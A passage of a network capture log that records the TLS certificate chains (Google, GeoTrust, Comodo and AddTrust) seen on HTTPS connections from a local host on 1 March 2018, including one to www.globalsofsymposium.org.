Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 E2 BD 9A 07 F5 F5 DA 55 5E 8D 0F 91 44 B9 9C ........U^...D..0010: 85 64 F8 F1 .d..]]] Algorithm: [SHA256withRSA] Signature:0000: 4A DD 72 25 01 23 EA 92 EE 36 78 25 97 84 0E B6 J.r%.#...6x%....0010: F4 BB 54 21 20 75 82 19 36 34 D6 22 54 3F E8 50 ..T! u..64."T?.P0020: 6F D1 0B C7 1A 8F 7C 3F 1E 35 47 DA 6A 27 56 AB o......?.5G.j'V.0030: 80 A6 D8 96 AB 1D 6E B1 E0 C3 44 87 59 35 2C 5B ......n...D.Y5,[0040: 30 59 B8 50 2E CA C3 89 DE 2C C3 8C 40 50 E7 F9 0Y.P.....,..@P..0050: 9B 83 FA AA FA 7F 43 99 A9 D0 3D C4 B0 E1 0E D2 ......C...=.....0060: 7F E4 58 1E BB 3D B9 0C FB 70 F2 3B 19 D3 7B 26 ..X..=...p.;...&0070: AC D4 4C 82 7A F7 5F AB 99 DA 14 28 A9 66 E7 B3 ..L.z._....(.f..0080: AC FA 42 60 98 8F 01 2B 6D 15 1E EC 4B 15 86 D0 ..B`...+m...K...0090: 17 01 C1 A2 43 EF F0 42 6F F6 3C 70 CE 63 62 E1 ....C..Bo.<p.cb.00A0: 0C 6A 00 86 44 F2 EA 82 96 4E 5D 2C 06 77 57 87 .j..D....N],.wW.00B0: 8A FF 5C EC 12 7B 68 42 45 E9 9F 6C CB 0C 66 B5 ..\...hBE..l..f.00C0: 00 02 7B 89 F1 81 05 EB 58 51 52 DC F9 F3 3D DA ........XQR...=.00D0: 24 42 CC FA F6 31 9E E9 A2 9D D3 1F B9 EF 32 13 $B...1........2.00E0: 36 E6 88 07 82 7B E4 60 D0 EF 74 6A 7E 27 31 D3 6......`..tj.'1.00F0: 84 3F 87 62 FA 34 7D 26 B1 A9 2B CE EE D1 7F ED .?.b.4.&..+.....]
Mar 1, 2018 09:56:52.243504047 CET	443	49165	172.217.3.164	192.168.2.2	CN=Google Internet Authority G2, O=Google Inc, C=US	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	Mon May 22 13:32:37 CEST 2017	Tue Jan 01 00:59:59 CET 2019	[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Mar 1, 2018 09:56:52.243504047 CET	443	49165	172.217.3.164	192.168.2.2	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	OU=Equifax Secure Certificate Authority, O=Equifax, C=US	Tue May 21 06:00:00 CEST 2002	Tue Aug 21 06:00:00 CEST 2018	[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Mar 1, 2018 09:57:18.208971024 CET	443	49170	45.33.77.71	192.168.2.2	CN=www.globalsofsymposium.org, OU=PositiveSSL, OU=Domain Control Validated	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Nov 10 01:00:00 CET 2017	Mon Nov 11 00:59:59 CET 2019	[[ Version: V3 Subject: CN=www.globalsofsymposium.org, OU=PositiveSSL, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 31416351373464893428318957242375546681220326715773720063859894946481752766266268880145028491649376601131447752334934885749813952518594046577786100468304724061679102341680477547407779160947558338722691808615914156008435375171622682315823953271649961422634941172027658585001929328624245769094543352673224239875517997046181984507809854885173125252800324830442806587672203997483496187697483676870776806717048917813532004553832725099646864842403464998158176029221124912817968520884949747893845494693159145207101053569891095290301792858585555795768460764952939799222630687691370997759460404195632447848631370216316577403927 public exponent: 65537 Validity: [From: Fri Nov 10 01:00:00 CET 2017, To: Mon Nov 11 00:59:59 CET 2019] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 8cb46106 5e5e708b 7bb0da74 bf901851]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: www.globalsofsymposium.org DNSName: globalsofsymposium.org][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 86 87 11 36 9E 51 5C 5E EB 6F 3E 01 DB 8C E3 BF ...6.Q\^.o>.....0010: DF CC AC 9D ....]]] Algorithm: [SHA256withRSA] Signature:0000: 82 7E 7D 76 FA F4 A2 8D CD 01 60 62 C2 CB BD 58 ...v......`b...X0010: 4D 28 7E AC F0 7E 12 1D 58 3E 4C 16 6D 86 56 FF M(......X>L.m.V.0020: 2D AE 6B 4A 12 12 50 F4 03 77 D3 23 76 E1 78 54 -.kJ..P..w.#v.xT0030: 33 F7 AC F6 1D 0C FB 80 7E 24 09 7A CF AC 4B A1 3........$.z..K.0040: 8A 25 E0 53 61 54 22 D7 AA 94 68 4C BE 6F 4C 4C .%.SaT"...hL.oLL0050: B2 0B AE D7 F8 71 3B 14 CD E5 F0 17 A6 36 E0 13 .....q;......6..0060: 77 79 9F C3 0B E7 53 B5 93 95 9C B2 87 BD 5D 6B wy....S.......]k0070: 1D 37 AF CC 94 42 4C FB 15 F4 CA 78 93 05 52 7D .7...BL....x..R.0080: E1 A0 CB 26 E7 CB C6 D5 6E 0C E2 7F 7D 73 50 F2 ...&....n....sP.0090: CD 9E 8A 9B CF 0F A6 92 A8 4C F0 1B C2 5B 46 9C .........L...[F.00A0: E5 B3 17 FD 68 CF 89 90 2E D1 61 DF 6D 30 19 E4 ....h.....a.m0..00B0: 3E A9 D3 4F B5 E3 A4 88 9A 8F 8E 43 FA 6A 94 35 >..O.......C.j.500C0: 5F BE 7F A3 F2 E4 AE 07 A9 9A A8 51 0A 71 9B 75 _..........Q.q.u00D0: 06 71 DD 19 30 04 C8 D1 5F 96 DC 3F 18 B9 8E DF .q..0..._..?....00E0: 58 EF 7D 19 1B 92 28 BC 39 3F 8F 29 1A CE A8 A3 X.....(.9?.)....00F0: 15 BE 18 50 E6 E1 97 C0 FC 11 72 10 D2 1A EE CD ...P......r.....]
Mar 1, 2018 09:57:18.208971024 CET	443	49170	45.33.77.71	192.168.2.2	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029	[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A .Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Mar 1, 2018 09:57:18.208971024 CET	443	49170	45.33.77.71	192.168.2.2	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020	[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]
Mar 1, 2018 09:57:46.660196066 CET	443	49177	172.217.3.174	192.168.2.2	CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US	CN=Google Internet Authority G2, O=Google Inc, C=US	Tue Feb 13 11:44:59 CET 2018	Tue May 08 12:40:00 CEST 2018	[[ Version: V3 Subject: CN=.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 13, session object) public x coord: 41116676421799618209132255387411135712113346617786606564587394758269250450342 public y coord: 8903066483074689096178068336359467744780947544914990778326164674500769873378 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Tue Feb 13 11:44:59 CET 2018, To: Tue May 08 12:40:00 CEST 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 06c06183 36fb6ee2]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: .google.com DNSName: .android.com DNSName: .appengine.google.com DNSName: .cloud.google.com DNSName: .db833953.google.cn DNSName: .g.co DNSName: .gcp.gvt2.com DNSName: .google-analytics.com DNSName: .google.ca DNSName: .google.cl DNSName: .google.co.in DNSName: .google.co.jp DNSName: .google.co.uk DNSName: .google.com.ar DNSName: .google.com.au DNSName: .google.com.br DNSName: .google.com.co DNSName: .google.com.mx DNSName: .google.com.tr DNSName: .google.com.vn DNSName: .google.de DNSName: .google.es DNSName: .google.fr DNSName: .google.hu DNSName: .google.it DNSName: .google.nl DNSName: .google.pl DNSName: .google.pt DNSName: .googleadapis.com DNSName: .googleapis.cn DNSName: .googlecommerce.com DNSName: .googlevideo.com DNSName: .gstatic.cn DNSName: .gstatic.com DNSName: .gvt1.com DNSName: .gvt2.com DNSName: .metric.gstatic.com DNSName: .urchin.com DNSName: .url.google.com DNSName: .youtube-nocookie.com DNSName: .youtube.com DNSName: .youtubeeducation.com DNSName: .yt.be DNSName: .ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: developers.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: source.android.google.cn DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com DNSName: yt.be][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 68 91 85 99 95 7C 21 EC BA 3C CA 79 68 77 52 82 h.....!..<.yhwR.0010: 1F A0 F7 9A ....]]] Algorithm: [SHA256withRSA] Signature:0000: 0B EC 9B A6 4E D6 80 C2 CC 2A AA 4B 3F 48 5D F2 ....N.....K?H].0010: 12 A4 4C 25 52 F4 6C 0A 0A 57 90 57 A1 00 01 05 ..L%R.l..W.W....0020: 0E A4 AA FA EA F8 7E 61 12 08 16 ED 48 15 53 FD .......a....H.S.0030: 66 05 59 80 DC DD 8F F1 4B 49 D5 CB 03 19 C6 AD f.Y.....KI......0040: 1F 6B 4A B0 C0 41 DC 02 C1 68 94 0D D1 8B F3 9D .kJ..A...h......0050: 0C D3 AC B4 C2 61 A3 A3 65 54 BA E8 F6 F9 FB F1 .....a..eT......0060: A5 6E 8E 5B CE 92 46 73 37 6A 09 56 35 30 CB 09 .n.[..Fs7j.V50..0070: E0 46 5C 8C 6D 71 0D 5B 8F AA 9B 22 02 42 09 C0 .F\.mq.[...".B..0080: 74 01 EE 28 47 30 03 B2 25 